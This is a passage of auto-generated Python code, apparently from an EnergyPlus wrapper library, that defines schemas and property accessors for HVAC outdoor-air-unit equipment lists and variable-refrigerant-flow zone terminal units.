{'name': u'Component 2 Name',
'pyname': u'component_2_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 3 object type',
{'name': u'Component 3 Object Type',
'pyname': u'component_3_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 3 name',
{'name': u'Component 3 Name',
'pyname': u'component_3_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 4 object type',
{'name': u'Component 4 Object Type',
'pyname': u'component_4_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 4 name',
{'name': u'Component 4 Name',
'pyname': u'component_4_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 5 object type',
{'name': u'Component 5 Object Type',
'pyname': u'component_5_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 5 name',
{'name': u'Component 5 Name',
'pyname': u'component_5_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 6 object type',
{'name': u'Component 6 Object Type',
'pyname': u'component_6_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 6 name',
{'name': u'Component 6 Name',
'pyname': u'component_6_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 7 object type',
{'name': u'Component 7 Object Type',
'pyname': u'component_7_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 7 name',
{'name': u'Component 7 Name',
'pyname': u'component_7_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 8 object type',
{'name': u'Component 8 Object Type',
'pyname': u'component_8_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 8 name',
{'name': u'Component 8 Name',
'pyname': u'component_8_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 0,
'name': u'ZoneHVAC:OutdoorAirUnit:EquipmentList',
'pyname': u'ZoneHvacOutdoorAirUnitEquipmentList',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def component_1_object_type(self):
"""field `Component 1 Object Type`
Args:
value (str): value for IDD Field `Component 1 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_1_object_type` or None if not set
"""
return self["Component 1 Object Type"]
@component_1_object_type.setter
def component_1_object_type(self, value=None):
"""Corresponds to IDD field `Component 1 Object Type`"""
self["Component 1 Object Type"] = value
@property
def component_1_name(self):
"""field `Component 1 Name`
Args:
value (str): value for IDD Field `Component 1 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_1_name` or None if not set
"""
return self["Component 1 Name"]
@component_1_name.setter
def component_1_name(self, value=None):
"""Corresponds to IDD field `Component 1 Name`"""
self["Component 1 Name"] = value
@property
def component_2_object_type(self):
"""field `Component 2 Object Type`
Args:
value (str): value for IDD Field `Component 2 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_2_object_type` or None if not set
"""
return self["Component 2 Object Type"]
@component_2_object_type.setter
def component_2_object_type(self, value=None):
"""Corresponds to IDD field `Component 2 Object Type`"""
self["Component 2 Object Type"] = value
@property
def component_2_name(self):
"""field `Component 2 Name`
Args:
value (str): value for IDD Field `Component 2 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_2_name` or None if not set
"""
return self["Component 2 Name"]
@component_2_name.setter
def component_2_name(self, value=None):
"""Corresponds to IDD field `Component 2 Name`"""
self["Component 2 Name"] = value
@property
def component_3_object_type(self):
"""field `Component 3 Object Type`
Args:
value (str): value for IDD Field `Component 3 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_3_object_type` or None if not set
"""
return self["Component 3 Object Type"]
@component_3_object_type.setter
def component_3_object_type(self, value=None):
"""Corresponds to IDD field `Component 3 Object Type`"""
self["Component 3 Object Type"] = value
@property
def component_3_name(self):
"""field `Component 3 Name`
Args:
value (str): value for IDD Field `Component 3 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_3_name` or None if not set
"""
return self["Component 3 Name"]
@component_3_name.setter
def component_3_name(self, value=None):
"""Corresponds to IDD field `Component 3 Name`"""
self["Component 3 Name"] = value
@property
def component_4_object_type(self):
"""field `Component 4 Object Type`
Args:
value (str): value for IDD Field `Component 4 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_4_object_type` or None if not set
"""
return self["Component 4 Object Type"]
@component_4_object_type.setter
def component_4_object_type(self, value=None):
"""Corresponds to IDD field `Component 4 Object Type`"""
self["Component 4 Object Type"] = value
@property
def component_4_name(self):
"""field `Component 4 Name`
Args:
value (str): value for IDD Field `Component 4 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_4_name` or None if not set
"""
return self["Component 4 Name"]
@component_4_name.setter
def component_4_name(self, value=None):
"""Corresponds to IDD field `Component 4 Name`"""
self["Component 4 Name"] = value
@property
def component_5_object_type(self):
"""field `Component 5 Object Type`
Args:
value (str): value for IDD Field `Component 5 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_5_object_type` or None if not set
"""
return self["Component 5 Object Type"]
@component_5_object_type.setter
def component_5_object_type(self, value=None):
"""Corresponds to IDD field `Component 5 Object Type`"""
self["Component 5 Object Type"] = value
@property
def component_5_name(self):
"""field `Component 5 Name`
Args:
value (str): value for IDD Field `Component 5 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_5_name` or None if not set
"""
return self["Component 5 Name"]
@component_5_name.setter
def component_5_name(self, value=None):
"""Corresponds to IDD field `Component 5 Name`"""
self["Component 5 Name"] = value
@property
def component_6_object_type(self):
"""field `Component 6 Object Type`
Args:
value (str): value for IDD Field `Component 6 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_6_object_type` or None if not set
"""
return self["Component 6 Object Type"]
@component_6_object_type.setter
def component_6_object_type(self, value=None):
"""Corresponds to IDD field `Component 6 Object Type`"""
self["Component 6 Object Type"] = value
@property
def component_6_name(self):
"""field `Component 6 Name`
Args:
value (str): value for IDD Field `Component 6 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_6_name` or None if not set
"""
return self["Component 6 Name"]
@component_6_name.setter
def component_6_name(self, value=None):
"""Corresponds to IDD field `Component 6 Name`"""
self["Component 6 Name"] = value
@property
def component_7_object_type(self):
"""field `Component 7 Object Type`
Args:
value (str): value for IDD Field `Component 7 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_7_object_type` or None if not set
"""
return self["Component 7 Object Type"]
@component_7_object_type.setter
def component_7_object_type(self, value=None):
"""Corresponds to IDD field `Component 7 Object Type`"""
self["Component 7 Object Type"] = value
@property
def component_7_name(self):
"""field `Component 7 Name`
Args:
value (str): value for IDD Field `Component 7 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_7_name` or None if not set
"""
return self["Component 7 Name"]
@component_7_name.setter
def component_7_name(self, value=None):
"""Corresponds to IDD field `Component 7 Name`"""
self["Component 7 Name"] = value
@property
def component_8_object_type(self):
"""field `Component 8 Object Type`
Args:
value (str): value for IDD Field `Component 8 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_8_object_type` or None if not set
"""
return self["Component 8 Object Type"]
@component_8_object_type.setter
def component_8_object_type(self, value=None):
"""Corresponds to IDD field `Component 8 Object Type`"""
self["Component 8 Object Type"] = value
@property
def component_8_name(self):
"""field `Component 8 Name`
Args:
value (str): value for IDD Field `Component 8 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_8_name` or None if not set
"""
return self["Component 8 Name"]
@component_8_name.setter
def component_8_name(self, value=None):
"""Corresponds to IDD field `Component 8 Name`"""
self["Component 8 Name"] = value
class ZoneHvacTerminalUnitVariableRefrigerantFlow(DataObject):
""" Corresponds to IDD object `ZoneHVAC:TerminalUnit:VariableRefrigerantFlow`
Zone terminal unit with variable refrigerant flow (VRF) DX cooling and heating coils
(air-to-air heat pump). The VRF terminal units are served by an
AirConditioner:VariableRefrigerantFlow system.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'zone terminal unit name',
{'name': u'Zone Terminal Unit Name',
'pyname': u'zone_terminal_unit_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'terminal unit availability schedule',
{'name': u'Terminal Unit Availability Schedule',
'pyname': u'terminal_unit_availability_schedule',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'terminal unit air inlet node name',
{'name': u'Terminal Unit Air Inlet Node Name',
'pyname': u'terminal_unit_air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'terminal unit air outlet node name',
{'name': u'Terminal Unit Air Outlet Node Name',
'pyname': u'terminal_unit_air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': False,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no cooling supply air flow rate',
{'name': u'No Cooling Supply Air Flow Rate',
'pyname': u'no_cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': False,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no heating supply air flow rate',
{'name': u'No Heating Supply Air Flow Rate',
'pyname': u'no_heating_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling outdoor air flow rate',
{'name': u'Cooling Outdoor Air Flow Rate',
'pyname': u'cooling_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating outdoor air flow rate',
{'name': u'Heating Outdoor Air Flow Rate',
'pyname': u'heating_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load outdoor air flow rate',
{'name': u'No Load Outdoor Air Flow Rate',
'pyname': u'no_load_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan placement',
{'name': u'Supply Air Fan Placement',
'pyname': u'supply_air_fan_placement',
'default': u'BlowThrough',
'required-field': False,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'default': u'Fan:ConstantVolume',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume',
u'Fan:VariableVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan object name',
{'name': u'Supply Air Fan Object Name',
'pyname': u'supply_air_fan_object_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outside air mixer object type',
{'name': u'Outside Air Mixer Object Type',
'pyname': u'outside_air_mixer_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outside air mixer object name',
{'name': u'Outside Air Mixer Object Name',
'pyname': u'outside_air_mixer_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:DX:VariableRefrigerantFlow',
u'Coil:Cooling:DX:VariableRefrigerantFlow:FluidTemperatureControl'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil object name',
{'name': u'Cooling Coil Object Name',
'pyname': u'cooling_coil_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:DX:VariableRefrigerantFlow',
u'Coil:Heating:DX:VariableRefrigerantFlow:FluidTemperatureControl'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil object name',
{'name': u'Heating Coil Object Name',
'pyname': u'heating_coil_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone terminal unit on parasitic electric energy use',
{'name': u'Zone Terminal Unit On Parasitic Electric Energy Use',
'pyname': u'zone_terminal_unit_on_parasitic_electric_energy_use',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'zone terminal unit off parasitic electric energy use',
{'name': u'Zone Terminal Unit Off Parasitic Electric Energy Use',
'pyname': u'zone_terminal_unit_off_parasitic_electric_energy_use',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'rated heating capacity sizing ratio',
{'name': u'Rated Heating Capacity Sizing Ratio',
'pyname': u'rated_heating_capacity_sizing_ratio',
'default': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 1.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W/W'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 19,
'name': u'ZoneHVAC:TerminalUnit:VariableRefrigerantFlow',
'pyname': u'ZoneHvacTerminalUnitVariableRefrigerantFlow',
'required-object': False,
'unique-object': False}
@property
def zone_terminal_unit_name(self):
"""field `Zone Terminal Unit Name`
Args:
value (str): value for IDD Field `Zone Terminal Unit Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_terminal_unit_name` or None if not set
"""
return self["Zone Terminal Unit Name"]
@zone_terminal_unit_name.setter
def zone_terminal_unit_name(self, value=None):
"""Corresponds to IDD field `Zone Terminal Unit Name`"""
self["Zone Terminal Unit Name"] = value
@property
def terminal_unit_availability_schedule(self):
"""field `Terminal Unit Availability Schedule`
| The unit is available the entire simulation if this field is left blank
| Schedule values of 0 denote the unit is off.
Args:
value (str): value for IDD Field `Terminal Unit Availability Schedule`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `terminal_unit_availability_schedule` or None if not set
"""
return self["Terminal Unit Availability Schedule"]
@terminal_unit_availability_schedule.setter
def terminal_unit_availability_schedule(self, value=None):
"""Corresponds to IDD field `Terminal Unit Availability Schedule`"""
self["Terminal Unit Availability Schedule"] = value
@property
def terminal_unit_air_inlet_node_name(self):
"""field `Terminal Unit Air Inlet Node Name`
| the inlet node to the terminal unit
Args:
value (str): value for IDD Field `Terminal Unit Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `terminal_unit_air_inlet_node_name` or None if not set
"""
return self["Terminal Unit Air Inlet Node Name"]
@terminal_unit_air_inlet_node_name.setter
def terminal_unit_air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Terminal Unit Air Inlet Node Name`"""
self["Terminal Unit Air Inlet Node Name"] = value
@property
def terminal_unit_air_outlet_node_name(self):
"""field `Terminal Unit Air Outlet Node Name`
| the outlet node of the terminal unit
Args:
value (str): value for IDD Field `Terminal Unit Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `terminal_unit_air_outlet_node_name` or None if not set
"""
return self["Terminal Unit Air Outlet Node Name"]
@terminal_unit_air_outlet_node_name.setter
def terminal_unit_air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Terminal Unit Air Outlet Node Name`"""
self["Terminal Unit Air Outlet Node Name"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def no_cooling_supply_air_flow_rate(self):
"""field `No Cooling Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_cooling_supply_air_flow_rate` or None if not set
"""
return self["No Cooling Supply Air Flow Rate"]
@no_cooling_supply_air_flow_rate.setter
def no_cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Cooling Supply Air Flow Rate`"""
self["No Cooling Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate(self):
"""field `Heating Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Supply Air Flow Rate"]
@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate`"""
self["Heating Supply Air Flow Rate"] = value
@property
def no_heating_supply_air_flow_rate(self):
"""field `No Heating Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_heating_supply_air_flow_rate` or None if not set
"""
return self["No Heating Supply Air Flow Rate"]
@no_heating_supply_air_flow_rate.setter
def no_heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Heating Supply Air Flow Rate`"""
self["No Heating Supply Air Flow Rate"] = value
@property
def cooling_outdoor_air_flow_rate(self):
"""field `Cooling Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_outdoor_air_flow_rate` or None if not set
"""
return self["Cooling Outdoor Air Flow Rate"]
@cooling_outdoor_air_flow_rate.setter
def cooling_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Outdoor Air Flow Rate`"""
self["Cooling Outdoor Air Flow Rate"] = value
@property
def heating_outdoor_air_flow_rate(self):
"""field `Heating Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_outdoor_air_flow_rate` or None if not set
"""
return self["Heating Outdoor Air Flow Rate"]
@heating_outdoor_air_flow_rate.setter
def heating_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Outdoor Air Flow Rate`"""
self["Heating Outdoor Air Flow Rate"] = value
@property
def no_load_outdoor_air_flow_rate(self):
"""field `No Load Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_outdoor_air_flow_rate` or None if not set
"""
return self["No Load Outdoor Air Flow Rate"]
@no_load_outdoor_air_flow_rate.setter
def no_load_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Outdoor Air Flow Rate`"""
self["No Load Outdoor Air Flow Rate"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def supply_air_fan_placement(self):
"""field `Supply Air Fan Placement`
| Select fan placement as either blow through or draw through.
| Default value: BlowThrough
Args:
value (str): value for IDD Field `Supply Air Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_placement` or None if not set
"""
return self["Supply Air Fan Placement"]
@supply_air_fan_placement.setter
def supply_air_fan_placement(self, value="BlowThrough"):
"""Corresponds to IDD field `Supply Air Fan Placement`"""
self["Supply Air Fan Placement"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Supply Air Fan Object Type must be
| Fan:OnOff or Fan:ConstantVolume
| if AirConditioner:VariableRefrigerantFlow
| is used to model VRF outdoor unit
| Supply Air Fan Object Type must be Fan:VariableVolume if
| AirConditioner:VariableRefrigerantFlow:FluidTemperatureControl
| is used to model VRF outdoor unit
| Default value: Fan:ConstantVolume
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value="Fan:ConstantVolume"):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_object_name(self):
"""field `Supply Air Fan Object Name`
Args:
value (str): value for IDD Field `Supply Air Fan Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_name` or None if not set
"""
return self["Supply Air Fan Object Name"]
@supply_air_fan_object_name.setter
def supply_air_fan_object_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Name`"""
self["Supply Air Fan Object Name"] = value
@property
def outside_air_mixer_object_type(self):
"""field `Outside Air Mixer Object Type`
| If this field is blank, and outside air mixer is not used.
Args:
value (str): value for IDD Field `Outside Air Mixer Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_air_mixer_object_type` or None if not set
"""
return self["Outside Air Mixer Object Type"]
@outside_air_mixer_object_type.setter
def outside_air_mixer_object_type(self, value=None):
"""Corresponds to IDD field `Outside Air Mixer Object Type`"""
self["Outside Air Mixer Object Type"] = value
@property
def outside_air_mixer_object_name(self):
"""field `Outside Air Mixer Object Name`
| If this field is blank, and outside air mixer is not used.
Args:
value (str): value for IDD Field `Outside Air Mixer Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_air_mixer_object_name` or None if not set
"""
return self["Outside Air Mixer Object Name"]
@outside_air_mixer_object_name.setter
def outside_air_mixer_object_name(self, value=None):
"""Corresponds to IDD field `Outside Air Mixer Object Name`"""
self["Outside Air Mixer Object Name"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
| Cooling Coil Type must be Coil:Cooling:DX:VariableRefrigerantFlow
| if AirConditioner:VariableRefrigerantFlow is used
| to model VRF outdoor unit
| Cooling Coil Type must be
| Coil:Cooling:DX:VariableRefrigerantFlow:FluidTemperatureControl
| if AirConditioner:VariableRefrigerantFlow:FluidTemperatureControl
| is used to model VRF outdoor unit
| This field may be left blank if heating-only mode is used
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_object_name(self):
"""field `Cooling Coil Object Name`
| Cooling Coil Type must be Coil:Cooling:DX:VariableRefrigerantFlow
| This field may be left blank if heating-only mode is used
Args:
value (str): value for IDD Field `Cooling Coil Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_name` or None if not set
"""
return self["Cooling Coil Object Name"]
@cooling_coil_object_name.setter
def cooling_coil_object_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Name`"""
self["Cooling Coil Object Name"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
| Heating Coil Type must be Coil:Heating:DX:VariableRefrigerantFlow
| if AirConditioner:VariableRefrigerantFlow is used
| to model VRF outdoor unit
| Heating Coil Type must be
| Coil:Heating:DX:VariableRefrigerantFlow:FluidTemperatureControl
| if AirConditioner:VariableRefrigerantFlow:FluidTemperatureControl
| is used to model VRF outdoor unit
| This field may be left blank if cooling-only mode is used
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_object_name(self):
"""field `Heating Coil Object Name`
| Heating Coil Type must be Coil:Heating:DX:VariableRefrigerantFlow
| This field may be left blank if cooling-only mode is used
Args:
value (str): value for IDD Field `Heating Coil Object Name`
Raises:
